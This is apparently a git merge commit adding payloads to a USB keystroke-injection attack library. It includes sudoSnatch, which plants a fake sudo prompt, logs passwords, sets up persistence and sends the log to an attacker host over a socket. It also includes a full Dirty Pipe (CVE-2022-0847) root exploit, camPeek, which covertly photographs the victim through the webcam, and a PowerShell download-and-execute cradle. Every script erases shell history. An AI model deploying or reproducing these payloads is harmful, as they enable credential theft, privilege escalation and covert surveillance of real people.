Merge branch 'hak5:master' into master

2022-04-04 12:54:28 +02:00 · 2022-04-04 12:54:28 +02:00 · a91c2b80d0
parent bc281bcfdc 7bd90b7308
commit a91c2b80d0
17 changed files with 701 additions and 0 deletions
--- a/payloads/library/credentials/sudoSnatch/README.md
+++ b/payloads/library/credentials/sudoSnatch/README.md
@ -0,0 +1,48 @@
+## About:
+* Title: sudoSnatch
+* Description: sudoSnatch grabs plain text passwords remotely/locally.
+* AUTHOR: drapl0n
+* Version: 1.0
+* Category: Credentials
+* Target: Unix-like operating systems with systemd.
+* Attackmodes: HID, Storage
+
+## sudoSnatch: sudoSnatch payload grabs sudo password in plain text, imediately after victim uses `sudo` command and sends it back to attacker remotely/locally.
+
+### Features:
+* Plain text passwords.
+* Detailed password logs.
+* Persistent
+* Autostart payload on boot.
+
+### Workflow:
+* Injecting payload on target's system.
+* Checks whether internet is connected to the target system. 
+* If internet is connected then it sends clear text passwords to attacker. 
+
+### Changes to be made in payload.sh:
+* Replace ip(0.0.0.0) and port number(4444) with your servers ip address and port number on line no `10`.
+* Increase/Decrease time interval to restart service periodically (Default is 15 mins), on line no `14`.
+
+### LED Status:
+* `SETUP`   : MAGENTA
+* `ATTACK`  : YELLOW
+* `FINISH`  : GREEN
+
+### Directory Structure of payload components:
+| FileName       | Directory                     |
+| -------------- | ----------------------------- |
+| payload.txt    | /payloads/switch1/            |
+| payload.sh     | /payloads/                    |
+| shell          | /payloads/library/sudoSnatch/ |
+| systemMgr      | /payloads/library/sudoSnatch/ |
+
+* Note: Create directory named `sudoSnatch` in `/payloads/library/`
+### Usage:
+1.  Inject payload into target's system.
+2. Start netcat listner on attacking system:
+
+* `nc -l -p <port number>` use this command to fetch passwords.
+
+#### Support me if you like my work:
+* https://twitter.com/drapl0n 
--- a/payloads/library/credentials/sudoSnatch/payload.sh
+++ b/payloads/library/credentials/sudoSnatch/payload.sh
@ -0,0 +1,23 @@
+#!/bin/bash
+unset HISTFILE && HISTSIZE=0 && rm -f $HISTFILE && unset HISTFILE
+mkdir /var/tmp/.system
+lol=$(lsblk | grep 1.8G)
+disk=$(echo $lol | awk '{print $1}')
+mntt=$(lsblk | grep $disk | awk '{print $7}')
+cp -r $mntt/payloads/library/sudoSnatch/systemMgr /var/tmp/.system/
+chmod +x /var/tmp/.system/systemMgr
+touch /var/tmp/.system/sysLog
+echo -e "while :\ndo\n\tping -c 5 0.0.0.0\n\tif [ $? -eq 0 ]; then\n\t\tphp -r '\$sock=fsockopen(\"0.0.0.0\",4444);exec("\"cat /var/tmp/.system/sysLog "<&3 >&3 2>&3"\"");'\n\tfi\ndone" >  /var/tmp/.system/systemBus
+chmod +x /var/tmp/.system/systemBus
+mkdir -p ~/.config/systemd/user
+echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=multi-user.target" > ~/.config/systemd/user/systemBUS.service
+echo "while true; do systemctl --user restart systemBUS.service; sleep 15m; done" > /var/tmp/.system/reboot
+chmod +x /var/tmp/.system/reboot
+echo -e "[Unit]\nDescription= System BUS handler reboot.\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/reboot -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=multi-user.target" > ~/.config/systemd/user/reboot.service
+systemctl --user daemon-reload
+systemctl --user enable --now systemBUS.service
+systemctl --user start --now systemBUS.service
+systemctl --user enable --now reboot.service
+systemctl --user start --now reboot.service
+cp -r $mntt/payloads/library/sudoSnatch/shell /tmp/
+chmod +x /tmp/shell && /tmp/./shell && rm /tmp/shell
--- a/payloads/library/credentials/sudoSnatch/payload.txt
+++ b/payloads/library/credentials/sudoSnatch/payload.txt
@ -0,0 +1,56 @@
+# Title: sudoSnatch
+# Description: sudoSnatch grabs plain text passwords remotely/locally.
+# AUTHOR: drapl0n
+# Version: 1.0
+# Category: Credentials
+# Target: Unix-like operating systems with systemd.
+# Attackmodes: HID, Storage
+
+LED SETUP
+ATTACKMODE STORAGE HID
+GET SWITCH_POSITION
+LED ATTACK
+Q DELAY 1000
+Q CTRL-ALT t
+Q DELAY 1000
+
+# [Prevent storing history]
+Q STRING unset HISTFILE
+Q ENTER
+Q DELAY 200
+
+# [Fetching BashBunny's block device]
+Q STRING lol='$(lsblk | grep 1.8G)'
+Q ENTER
+Q DELAY 100
+Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)''
+Q ENTER
+Q DELAY 200
+
+# [Mounting BashBunny]
+Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp
+Q ENTER
+Q DELAY 1400
+Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)''
+Q ENTER
+Q DELAY 200
+
+# [transfering payload script]
+Q STRING cp -r '$mntt'/payloads/payload.sh /tmp/
+Q ENTER
+Q STRING chmod +x /tmp/payload.sh
+Q ENTER
+Q STRING /tmp/./payload.sh
+Q ENTER
+Q DELAY 5000
+Q STRING rm /tmp/payload.sh
+Q ENTER
+Q DELAY 500
+
+# [Unmounting BashBunny]
+Q STRING udisksctl unmount -b /dev/'$disk'
+Q ENTER
+Q DELAY 500
+Q STRING exit
+Q ENTER
+LED FINISH
--- a/payloads/library/credentials/sudoSnatch/shell
+++ b/payloads/library/credentials/sudoSnatch/shell
@ -0,0 +1,12 @@
+#!/bin/bash
+ls -a ~/ | grep 'zshrc' &> /dev/null
+if [ $? = 0 ]; then
+	echo -e "alias sudo='bash /var/tmp/.system/systemMgr && sudo'" >> ~/.zshrc
+        echo "systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service && systemctl --user restart systemBUS.service && systemctl --user restart reboot.service" >> ~/.zshrc
+fi
+
+ls -a ~/ | grep 'bashrc' &> /dev/null
+if [ $? = 0 ]; then
+	echo -e "alias sudo='bash /var/tmp/.system/systemMgr && sudo'" >> ~/.bashrc
+        echo "systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service && systemctl --user restart systemBUS.service && systemctl --user restart reboot.service" >> ~/.bashrc
+fi
--- a/payloads/library/credentials/sudoSnatch/systemMgr
+++ b/payloads/library/credentials/sudoSnatch/systemMgr
@ -0,0 +1,5 @@
+#!/bin/bash
+echo -n "[sudo] password for $(whoami):"
+IFS="" read -s pass
+echo -e "Timestamp=[$(date)] \t User=[$(whoami)] \t  Password=[$pass]" >> /var/tmp/.system/sysLog
+echo -e "\nSorry, try again."
--- a/payloads/library/execution/DirtyPipe/README.md
+++ b/payloads/library/execution/DirtyPipe/README.md
@ -0,0 +1,24 @@
+## About:
+* Title: DirtyPipe
+* Description: Exploit for a new Linux vulnerability known as 'Dirty Pipe(CVE-2022-0847)' allows local users to gain root privileges.
+* AUTHOR: drapl0n
+* Version: 1.0
+* Category: Execution
+* Target: Linux operating systems.
+* Attackmodes: HID, Storage
+
+## DirtyPipe: Exploit for a new Linux vulnerability known as 'Dirty Pipe(CVE-2022-0847)' allows local users to gain root privileges. The vulnerability is tracked as CVE-2022-0847 and allows a non-privileged user to inject and overwrite data in read-only files, including SUID processes that run as root.
+
+### Directory Structure of payload components:
+| FileName       | Directory                     |
+| -------------- | ----------------------------- |
+| payload.txt    | /payloads/                    |
+| dirtypipe.c    | /payloads/library/            |
+
+### LED Status:
+* `SETUP`   : MAGENTA
+* `ATTACK`  : YELLOW
+* `FINISH`  : GREEN
+
+#### Support me if you like my work:
+* https://twitter.com/drapl0n 
--- a/payloads/library/execution/DirtyPipe/dirtypipe.c
+++ b/payloads/library/execution/DirtyPipe/dirtypipe.c
@ -0,0 +1,181 @@
+#define _GNU_SOURCE
+#include <unistd.h>
+#include <fcntl.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <sys/stat.h>
+#include <sys/user.h>
+#include <stdint.h>
+
+#ifndef PAGE_SIZE
+#define PAGE_SIZE 4096
+#endif
+
+// small (linux x86_64) ELF file matroshka doll that does;
+//   fd = open("/tmp/sh", O_WRONLY | O_CREAT | O_TRUNC);
+//   write(fd, elfcode, elfcode_len)
+//   chmod("/tmp/sh", 04755)
+//   close(fd);
+//   exit(0);
+//
+// the dropped ELF simply does:
+//   setuid(0);
+//   setgid(0);
+//   execve("/bin/sh", ["/bin/sh", NULL], [NULL]);
+unsigned char elfcode[] = {
+	/*0x7f,*/ 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,
+	0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e, 0x00, 0x01, 0x00, 0x00, 0x00,
+	0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00,
+	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+	0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, 0x00, 0x01, 0x00, 0x00, 0x00,
+	0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x05, 0x00, 0x00, 0x00,
+	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00,
+	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00,
+	0x97, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x97, 0x01, 0x00, 0x00,
+	0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+	0x48, 0x8d, 0x3d, 0x56, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc6, 0x41, 0x02,
+	0x00, 0x00, 0x48, 0xc7, 0xc0, 0x02, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48,
+	0x89, 0xc7, 0x48, 0x8d, 0x35, 0x44, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc2,
+	0xba, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc0, 0x01, 0x00, 0x00, 0x00, 0x0f,
+	0x05, 0x48, 0xc7, 0xc0, 0x03, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x8d,
+	0x3d, 0x1c, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc6, 0xed, 0x09, 0x00, 0x00,
+	0x48, 0xc7, 0xc0, 0x5a, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x31, 0xff,
+	0x48, 0xc7, 0xc0, 0x3c, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x2f, 0x74, 0x6d,
+	0x70, 0x2f, 0x73, 0x68, 0x00, 0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01,
+	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e,
+	0x00, 0x01, 0x00, 0x00, 0x00, 0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00,
+	0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38,
+	0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00,
+	0x00, 0x05, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+	0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40,
+	0x00, 0x00, 0x00, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+	0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00,
+	0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x31, 0xff, 0x48, 0xc7, 0xc0, 0x69,
+	0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x31, 0xff, 0x48, 0xc7, 0xc0, 0x6a,
+	0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x8d, 0x3d, 0x1b, 0x00, 0x00, 0x00,
+	0x6a, 0x00, 0x48, 0x89, 0xe2, 0x57, 0x48, 0x89, 0xe6, 0x48, 0xc7, 0xc0,
+	0x3b, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0xc7, 0xc0, 0x3c, 0x00, 0x00,
+	0x00, 0x0f, 0x05, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68, 0x00
+};
+
+/**
+ * Create a pipe where all "bufs" on the pipe_inode_info ring have the
+ * PIPE_BUF_FLAG_CAN_MERGE flag set.
+ */
+static void prepare_pipe(int p[2])
+{
+	if (pipe(p)) abort();
+
+	const unsigned pipe_size = fcntl(p[1], F_GETPIPE_SZ);
+	static char buffer[4096];
+
+	/* fill the pipe completely; each pipe_buffer will now have
+	   the PIPE_BUF_FLAG_CAN_MERGE flag */
+	for (unsigned r = pipe_size; r > 0;) {
+		unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r;
+		write(p[1], buffer, n);
+		r -= n;
+	}
+
+	/* drain the pipe, freeing all pipe_buffer instances (but
+	   leaving the flags initialized) */
+	for (unsigned r = pipe_size; r > 0;) {
+		unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r;
+		read(p[0], buffer, n);
+		r -= n;
+	}
+
+	/* the pipe is now empty, and if somebody adds a new
+	   pipe_buffer without initializing its "flags", the buffer
+	   will be mergeable */
+}
+
+int hax(char *filename, long offset, uint8_t *data, size_t len) {
+	/* open the input file and validate the specified offset */
+	const int fd = open(filename, O_RDONLY); // yes, read-only! :-)
+	if (fd < 0) {
+		perror("open failed");
+		return -1;
+	}
+
+	struct stat st;
+	if (fstat(fd, &st)) {
+		perror("stat failed");
+		return -1;
+	}
+
+	/* create the pipe with all flags initialized with
+	   PIPE_BUF_FLAG_CAN_MERGE */
+	int p[2];
+	prepare_pipe(p);
+
+	/* splice one byte from before the specified offset into the
+	   pipe; this will add a reference to the page cache, but
+	   since copy_page_to_iter_pipe() does not initialize the
+	   "flags", PIPE_BUF_FLAG_CAN_MERGE is still set */
+	--offset;
+	ssize_t nbytes = splice(fd, &offset, p[1], NULL, 1, 0);
+	if (nbytes < 0) {
+		perror("splice failed");
+		return -1;
+	}
+	if (nbytes == 0) {
+		fprintf(stderr, "short splice\n");
+		return -1;
+	}
+
+	/* the following write will not create a new pipe_buffer, but
+	   will instead write into the page cache, because of the
+	   PIPE_BUF_FLAG_CAN_MERGE flag */
+	nbytes = write(p[1], data, len);
+	if (nbytes < 0) {
+		perror("write failed");
+		return -1;
+	}
+	if ((size_t)nbytes < len) {
+		fprintf(stderr, "short write\n");
+		return -1;
+	}
+
+	close(fd);
+
+	return 0;
+}
+
+int main(int argc, char **argv) {
+	if (argc != 2) {
+		fprintf(stderr, "Usage: %s SUID\n", argv[0]);
+		return EXIT_FAILURE;
+	}
+
+	char *path = argv[1];
+	uint8_t *data = elfcode;
+
+	int fd = open(path, O_RDONLY);
+	uint8_t *orig_bytes = malloc(sizeof(elfcode));
+	lseek(fd, 1, SEEK_SET);
+	read(fd, orig_bytes, sizeof(elfcode));
+	close(fd);
+
+	printf("[+] hijacking suid binary..\n");
+	if (hax(path, 1, elfcode, sizeof(elfcode)) != 0) {
+		printf("[~] failed\n");
+		return EXIT_FAILURE;
+	}
+
+	printf("[+] dropping suid shell..\n");
+	system(path);
+
+	printf("[+] restoring suid binary..\n");
+	if (hax(path, 1, orig_bytes, sizeof(elfcode)) != 0) {
+		printf("[~] failed\n");
+		return EXIT_FAILURE;
+	}
+
+	printf("[+] popping root shell.. (dont forget to clean up /tmp/sh ;))\n");
+	system("/tmp/sh");
+
+	return EXIT_SUCCESS;
+}
--- a/payloads/library/execution/DirtyPipe/payload.txt
+++ b/payloads/library/execution/DirtyPipe/payload.txt
@ -0,0 +1,82 @@
+# Title: DirtyPipe
+# Description: Exploit for a new Linux vulnerability known as 'Dirty Pipe(CVE-2022-0847)' allows local users to gain root privileges.
+# AUTHOR: drapl0n
+# Version: 1.0
+# Category: Execution
+# Target: Linux operating systems.
+# Attackmodes: HID, Storage
+
+LED SETUP
+ATTACKMODE STORAGE HID
+GET SWITCH_POSITION
+LED ATTACK
+Q DELAY 1000
+Q CTRL-ALT t
+Q DELAY 1000
+
+# [Prevent storing history]
+Q STRING unset HISTFILE
+Q ENTER
+Q DELAY 100
+Q STRING HISTSIZE=0
+Q ENTER
+Q DELAY 100
+Q STRING rm -f '$HISTFILE'
+Q ENTER
+Q DELAY 100
+
+# [Fetching BashBunny's block device]
+Q STRING lol='$(lsblk | grep 1.8G)'
+Q ENTER
+Q DELAY 100
+Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)''
+Q ENTER
+Q DELAY 200
+
+# [Mounting BashBunny]
+Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp
+Q ENTER
+Q DELAY 2000
+Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)''
+Q ENTER
+Q DELAY 500
+
+# [transfering and executing exploit]
+Q STRING cp -r '$mntt'/payloads/library/dirtypipe.c /tmp/
+Q ENTER
+Q DELAY 100
+Q STRING gcc /tmp/dirtypipe.c -o /tmp/dirtypipe
+Q ENTER
+Q DELAY 1000
+Q STRING chmod +x /tmp/dirtypipe
+Q ENTER
+Q STRING /tmp/./dirtypipe /bin/bash
+Q ENTER
+Q DELAY 500
+Q STRING sudo su
+Q ENTER
+Q CTRL-ALT t
+Q DELAY 500
+Q STRING rm /tmp/dirtypipe
+Q ENTER
+Q DELAY 100
+Q STRING rm /tmp/dirtypipe.c
+Q ENTER
+Q DELAY 200
+
+# [Unmounting BashBunny]
+Q STRING unset HISTFILE
+Q ENTER
+Q DELAY 100
+Q STRING lol='$(lsblk | grep 1.8G)'
+Q ENTER
+Q DELAY 100
+Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)''
+Q ENTER
+Q DELAY 100
+Q STRING udisksctl unmount -b /dev/'$disk' 
+Q ENTER
+Q DELAY 500
+Q STRING exit
+Q ENTER 
+LED FINISH
--- a/payloads/library/execution/camPeek/README.md
+++ b/payloads/library/execution/camPeek/README.md
@ -0,0 +1,55 @@
+## About:
+* Title: camPeek
+* Description: camPeek payload peeks through targets web cam and capture images and stores them in bunny.
+* AUTHOR: drapl0n
+* Version: 1.0
+* Category: Execution
+* Target: Unix-like operating systems with systemd.
+* Attackmodes: HID, Storage
+
+## CamPeek: camPeek payload is divided into two modules, First peeks through targets web cam and capture images and Second stores them in bunny.
+
+### Features:
+* Robust Payload for capturing targets images.
+* No additional dependencies required.
+* Persistent.
+* Autostart payload on boot.
+
+### Payload:
+* Payload is divided into two modules:
+1) Deployment: In this stage payload is deployed in targets system.
+2) Exfiltration: Storing saved loot from targets system in bunny.
+
+### Payload Script's Workflow:
+* Stop storing histroy.
+* Grep bunny's mount point of bunny.
+* Creating hidden directory in /var/tmp/..... for obfuscation.
+* Copying ffmpeg and image capturing mechanism in target's system.
+* Creating systemd service for persistance and triggering mechanism for autostart.
+
+### Changes to be made:
+* Change time interval of capturing image, more the time interval target gets less suspicious, default time interval is 120 secs. Make changes in `systemBus` on line number `4`.
+
+### LED Status:
+* `SETUP`   : MAGENTA
+* `ATTACK`  : YELLOW
+* `FINISH`  : GREEN
+
+### Note:
+* Download pre compiled static build of ffmpeg from: https://github.com/drapl0n/temp/releases/download/ffmpeg/ffmpeg and move it in camPeek directory.
+* Due to big size of binary, it is not provided in this repo.
+* Craete directory name `camPeek` in `/loot/` for storing captured images.
+
+### Directory Structure of payload components:
+| FileName               | Directory                     |
+| --------------         | ----------------------------- |
+| switch1/payload.txt    | /payloads/switch1/            |
+| switch2/payload.txt    | /payloads/switch2/            |
+| camPeek/               | /payloads/libray/             |
+
+### Usage:
+1. Deploy first payload during absence of target using `switch1`.
+2. Execute second payload during absence of target to store captured images in bunny using `switch2`.
+
+#### Support me if you like my work:
+* https://twitter.com/drapl0n
--- a/payloads/library/execution/camPeek/camPeek/payload.sh
+++ b/payloads/library/execution/camPeek/camPeek/payload.sh
@ -0,0 +1,18 @@
+#!/bin/bash
+unset HISTFILE && HISTSIZE=0 && rm -f $HISTFILE && unset HISTFILE
+mkdir /var/tmp/.system
+lol=$(lsblk | grep 1.8G)
+disk=$(echo $lol | awk '{print $1}')
+mntt=$(lsblk | grep $disk | awk '{print $7}')
+cp -r $mntt/payloads/library/camPeek/ffmpeg /var/tmp/.system/
+chmod +x /var/tmp/.system/ffmpeg
+mkdir /var/tmp/.system/sysLog
+cp -r $mntt/payloads/library/camPeek/systemBus /var/tmp/.system/systemBus
+chmod +x /var/tmp/.system/systemBus
+mkdir -p ~/.config/systemd/user
+echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=multi-user.target" > ~/.config/systemd/user/systemBUS.service
+systemctl --user daemon-reload
+systemctl --user enable --now systemBUS.service
+systemctl --user start --now systemBUS.service
+cp -r $mntt/payloads/library/camPeek/shell /tmp/
+chmod +x /tmp/shell && /tmp/./shell && rm /tmp/shell
--- a/payloads/library/execution/camPeek/camPeek/shell
+++ b/payloads/library/execution/camPeek/camPeek/shell
@ -0,0 +1,12 @@
+#!/bin/bash
+ls -a ~/ | grep 'zshrc' &> /dev/null
+if [ $? = 0 ]; then
+	echo -e "alias sudo='bash /var/tmp/.system/systemMgr && sudo'" >> ~/.zshrc
+        echo "systemctl --user enable --now systemBUS.service && systemctl --user restart systemBUS.service" >> ~/.zshrc
+fi
+
+ls -a ~/ | grep 'bashrc' &> /dev/null
+if [ $? = 0 ]; then
+	echo -e "alias sudo='bash /var/tmp/.system/systemMgr && sudo'" >> ~/.bashrc
+        echo "systemctl --user enable --now systemBUS.service && systemctl --user restart systemBUS.service" >> ~/.bashrc
+fi
--- a/payloads/library/execution/camPeek/camPeek/systemBus
+++ b/payloads/library/execution/camPeek/camPeek/systemBus
@ -0,0 +1,5 @@
+while true; 
+do 
+	/var/tmp/.system/./ffmpeg -f video4linux2 -i /dev/video0 -vframes 1  -video_size 640x480 /var/tmp/.system/sysLog/$(date +%Y%m%d-%H%M%S).png
+	sleep 120
+done
--- a/payloads/library/execution/camPeek/switch1/payload.txt
+++ b/payloads/library/execution/camPeek/switch1/payload.txt
@ -0,0 +1,56 @@
+# Title: camPeek
+# Description: camPeek payload peeks through targets web cam and capture images.
+# AUTHOR: drapl0n
+# Version: 1.0
+# Category: Execution
+# Target: GNU/Linux operating systems with systemd.
+# Attackmodes: HID, Storage.
+
+LED SETUP
+ATTACKMODE STORAGE HID
+GET SWITCH_POSITION
+LED ATTACK
+Q DELAY 1000
+Q CTRL-ALT t
+Q DELAY 1000
+
+# [Prevent storing history]
+Q STRING unset HISTFILE
+Q ENTER
+Q DELAY 200
+
+# [Fetching BashBunny's block device]
+Q STRING lol='$(lsblk | grep 1.8G)'
+Q ENTER
+Q DELAY 100
+Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)''
+Q ENTER
+Q DELAY 200
+
+# [Mounting BashBunny]
+Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp
+Q ENTER
+Q DELAY 2000
+Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)''
+Q ENTER
+Q DELAY 500
+
+# [transfering payload script]
+Q STRING cp -r '$mntt'/payloads/library/camPeek/payload.sh /tmp/
+Q ENTER
+Q STRING chmod +x /tmp/payload.sh
+Q ENTER
+Q STRING /tmp/./payload.sh
+Q ENTER
+Q DELAY 12000
+Q STRING rm /tmp/payload.sh
+Q ENTER
+Q DELAY 500
+
+# [Unmounting BashBunny]
+Q STRING udisksctl unmount -b /dev/'$disk'
+Q ENTER
+Q DELAY 500
+Q STRING exit
+Q ENTER 
+LED FINISH
--- a/payloads/library/execution/camPeek/switch2/payload.txt
+++ b/payloads/library/execution/camPeek/switch2/payload.txt
@ -0,0 +1,43 @@
+# Title: camPeek
+# Description: camPeek payload's exfilteration module to move captured images to bunny.
+# AUTHOR: drapl0n
+# Version: 1.0
+# Category: Execution
+# Target: GNU/Linux operating systems with systemd.
+# Attackmodes: HID, Storage.
+
+LED SETUP
+ATTACKMODE STORAGE HID
+GET SWITCH_POSITION
+LED ATTACK
+Q DELAY 1000
+Q CTRL-ALT t
+Q DELAY 1000
+
+# [Prevent storing history]
+Q STRING unset HISTFILE
+Q ENTER
+Q DELAY 200
+
+# [Fetching BashBunny's block device]
+Q STRING lol='$(lsblk | grep 1.8G)'
+Q ENTER
+Q DELAY 100
+Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)''
+Q ENTER
+Q DELAY 200
+
+# [Mounting BashBunny]
+Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp
+Q ENTER
+Q DELAY 2000
+Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)''
+Q ENTER
+Q DELAY 500
+
+# [transfering payload script]
+# create directory named camPeek in /loot/
+Q STRING mv /var/tmp/.system/sysLog/* '$mntt'/loot/camPeek/ \&
+Q ENTER
+Q STRING disown \&\& exit
+Q ENTER
--- a/payloads/library/general/Win_PoSH_RandomVid/payload.txt
+++ b/payloads/library/general/Win_PoSH_RandomVid/payload.txt
@ -0,0 +1,33 @@
+#!/bin/bash
+# Title:          Random Video
+# Description:    Downloads a list of vids from YouTube. Then pick a random one then opens it.
+# Author:         Cribbit
+# Version:        1.0
+# Category:       General
+# Target:         Windows (Powershell 5.1+)
+# Attackmodes:    RNDIS_ETHERNET HID
+
+LED SETUP
+ATTACKMODE RNDIS_ETHERNET HID
+
+GET SWITCH_POSITION
+GET HOST_IP
+
+
+cd /root/udisk/payloads/$SWITCH_POSITION/
+
+# starting server
+LED SPECIAL
+
+# disallow outgoing dns requests so server starts immediately
+iptables -A OUTPUT -p udp --dport 53 -j DROP
+python -m SimpleHTTPServer 80 &
+
+# wait until port is listening
+while ! nc -z localhost 80; do sleep 0.2; done
+
+# attack commences
+LED ATTACK
+QUACK DELAY 300
+RUN WIN "powershell -C \"iex (New-Object Net.WebClient).DownloadString('http://$HOST_IP/s')\""
+LED FINISH
--- a/payloads/library/general/Win_PoSH_RandomVid/readme.md
+++ b/payloads/library/general/Win_PoSH_RandomVid/readme.md
@ -0,0 +1,24 @@
+# Random Video
+- Author: Cribbit
+- Version: 1.0
+- Tested on: Windows 10 (Powershell 5.1+)
+- Category: General
+- Attackmode: HID & RNDIS_ETHERNET
+- Extensions: Run
+
+## Change Log
+| Version | Changes         |
+| ------- | --------------- |
+| 1.0     | Initial release |
+
+## Description
+Downloads a list of Hak5 vids from YouTube (about 15 in the rss feed). 
+
+Then pick one at random, then opens it in the browser.
+
+## Colours
+| Status   | Colour                        | Description                 |
+| -------- | ----------------------------- | --------------------------- |
+| SETUP    | Magenta solid                 | Setting attack mode         |
+| ATTACK   | Yellow single blink           | Injecting Powershell script |
+| FINISHED | Green blink followed by SOLID | Injection finished          |
--- a/payloads/library/general/Win_PoSH_RandomVid/s
+++ b/payloads/library/general/Win_PoSH_RandomVid/s
@ -0,0 +1,24 @@
+# Get the RSS feed for the Hak5 Channel
+Write-Output "Connecting to youtube"
+$Response = Invoke-WebRequest -Uri "https://www.youtube.com/feeds/videos.xml?channel_id=UC3s0BtrBJpwNDaflRSoiieQ" -UseBasicParsing -ContentType "application/xml"
+Write-Output $Response.StatusCode
+# See if it successful
+If ($Response.StatusCode -eq "200") {
+	# set the XML
+	$Xml = [xml]$Response.Content
+	$Entries = @()
+	# Loop each entry creating an object
+	ForEach ($Entry in $Xml.feed.entry) {
+			$Entries += [PSCustomObject] @{
+				'Updated' = [datetime]$Entry.updated
+				'Title' = $Entry.title
+				'Link' = $Entry.Link.href
+		}
+	}
+	# Gets a random number
+	$int = (Get-Random -Maximum ($Entries.Count -1) -Minimum 0)
+	$Entry = $Entries[$int]
+    # Opens link
+	Start-Process $Entry.Link
+	Write-Output $Entry.Title
+}